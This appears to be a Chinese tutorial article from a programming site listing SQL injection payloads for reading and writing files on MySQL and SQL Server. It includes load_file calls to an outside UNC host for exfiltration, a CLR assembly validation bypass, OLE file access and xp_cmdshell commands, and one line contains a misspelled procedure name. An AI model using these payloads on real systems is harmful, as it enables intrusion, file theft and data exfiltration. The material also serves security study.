脚本之家 服务器常用软件
快捷导航
您的位置:首页数据库数据库其它 → SQL注入中文件读写

关于SQL注入中文件读写的方法总结

 更新时间:2017年03月21日 08:46:49   作者:该隐  
这篇文章主要给大家介绍了关于SQL注入中文件的读写方法,文中通过示例代码介绍的非常详细,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。

前言

SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。

一、MySQL

读文件

常见的读文件,可以用16进制代替字符串

select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt') # smb协议
select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道

写文件

我暂时已知l两种写文件的方式

select 0x313233 into outfile 'D:/1.txt'
select 0x313233 into dumpfile 'D:/1.txt'

二、 SQL Server

读文件

1. BULK INSERT

create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';

2. CLR集成

// 开启CLR集成
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'clr enabled',1
reconfigure
create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。

create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt'
alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

# 开启Ole Automation Procedures
 
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_onmethod @f, 'readline', @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

写文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP复制文件(测试失败,无bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

三、Oracle

pass,Oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论

总结

以上就是关于SQL注入中文件的读写方法总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流。

您可能感兴趣的文章:

相关文章

  • 数据库连接池Druid与Hikari对比详解

    数据库连接池Druid与Hikari对比详解

    这篇文章主要为大家介绍了数据库连接池Druid与Hikari对比详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪
    2023-02-02
  • TinkerPop框架查询Gremlin图实现过程详解

    TinkerPop框架查询Gremlin图实现过程详解

    这篇文章主要为大家介绍了TinkerPop框架查询Gremlin图实现过程详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪
    2022-11-11
  • SQLite与MySQL区别及优缺点介绍

    SQLite与MySQL区别及优缺点介绍

    这篇文章介绍了SQLite与MySQL的区别及优缺点,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2022-01-01
  • MSSQL转MYSQL的一些记录

    MSSQL转MYSQL的一些记录

    今天把一个MSSQL的数据库转成MYSQL,在没有转换工具的情况下,对于字段不多的数据表我用了如下手功转换的方法,还算方便。MSSQL使用企业管理器操作,MYSQL用phpmyadmin操作。
    2010-02-02
  • 你也许连删库跑路都不会(delete、drop和truncate删除数据)

    你也许连删库跑路都不会(delete、drop和truncate删除数据)

    这篇文章主要给大家介绍了关于delete、drop和truncate删除数据的方式,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2020-11-11
  • 一个提升PostgreSQL性能的小技巧

    一个提升PostgreSQL性能的小技巧

    这篇文章主要介绍了一个提升Postgres性能的小技巧,通过修改很少的代码来优化查询,需要的朋友可以参考下
    2015-04-04
  • Navicat15激活使用教程

    Navicat15激活使用教程

    navicat15激活工具是一款针对同名软件所推出的激活码注册生成器,接下来通过本文给大家介绍Navicat15激活使用教程,需要的朋友可以参考下
    2021-10-10
  • MySQL mysqldump命令使用详解

    MySQL mysqldump命令使用详解

    MySQL有很多可以导入数据的方法,然而这些只是数据传输中的一半,另外的一般是从MySQL数据库中导出数据。有许多的原因我们需要导出数据。一个重要的原因是用于备份数据库。数据的造价常常是昂贵的,需要谨慎处理它们。
    2006-12-12
  • 浅谈数据库缓存最终一致性的四种方案

    浅谈数据库缓存最终一致性的四种方案

    缓存是软件开发中一个非常有用的概念,数据库缓存更是在项目中必然会遇到的场景,缓存一致性的保证,更是在面试中被反复问到。下面我们就一起来了解一下
    2021-04-04
  • 识别 MS SQL 各个版本的版本号的方法

    识别 MS SQL 各个版本的版本号的方法

    识别 MS SQL 各个版本的版本号的方法...
    2007-10-10

最新评论